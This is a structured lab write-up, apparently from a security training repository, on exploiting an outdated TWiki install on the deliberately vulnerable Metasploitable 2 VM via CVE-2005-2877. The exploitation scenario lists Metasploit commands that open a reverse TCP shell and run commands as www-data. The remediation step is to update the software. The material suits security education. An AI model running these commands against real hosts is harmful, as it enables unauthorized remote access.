## Version 1.4.0
## language: en

Feature:
  TOE:
    Metasploitable 2
  Page name:
    Metasploitable 2
  CWE-88: Argument Injection or Modification -base-
      https://cwe.mitre.org/data/definitions/88.html
    CWE-77: Improper Neutralization of Special Elements used in a Command
    ('Command Injection') -class-
      https://cwe.mitre.org/data/definitions/77.html
    CWE-990: SFP Secondary Cluster: Tainted Input to Command -category-
      https://cwe.mitre.org/data/definitions/990.html
  CAPEC:
    CAPEC-88: OS Command Injection -standard-
      http://capec.mitre.org/data/definitions/88.html
    CAPEC-248: Command Injection -meta-
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Gain access to the host machine.
  Recommendation:
    Update twiki version.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.18.0      |
    | Google Chrome   | 71.0.3578   |
    | Metasploit      | 2.6.24      |
  TOE information:
    Given I am accessing the site """http://192.168.2.41/twiki"""
    And enter a web site that displays different links to pages
    And the server is running PHP version 5.2.4
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario: Normal use case
  Accesing the website as normal
    Given I access """http://192.168.2.41/twiki"""
    Then I can see a webpage with links to twiki page
    And I can see it show """Twiki version 02 Feb 2003""" in the footer

  Scenario: Static detection
  No code given

  Scenario: Dynamic detection
  Outdated Twiki version
    Given I execute the following command in metasploit framework:
    """msf > search twiki"""
    Then I get this output:

    """exploit/unix/webapp/twiki_history 2005-09-14"""
    Then I conclude the machine is vulnerable to metasploit
    And after some research I find CVE-2005-2877 - twiki vuln
    And find a metasploit module to exploit it
    Then I conclude I can gain access to the machine

  Scenario: Exploitation
  Get a shell in the target machine
    Given target machine is running a twiki version vulnerable to CVE-2005-2877
    Then I execute the following commands:

    """
    # msfconsole
    msf > use exploit/unix/webapp/twiki_history
    msf exploit(unix/webapp/twiki_history) > set rhost 192.168.2.41
    msf exploit(unix/webapp/twiki_history) > run
    """
    Then I get the output:

    """
    [*] Started reverse TCP double handler on 192.168.2.42:4444
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [+] Successfully sent exploit request
    """
    Then I can run commands on the machine
    And I run
    """
    uname -a
    Linux metasploitable 2.6.24-16-server
    id
    uid=33(www-data)
    """
    Then I have successfully granted myself access as the user www-data

  Scenario: Remediation
  Update outdated software
  Given The system uses an outdated software.
  Then I updated the software and the vulnerability is fixed.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2018-12-20
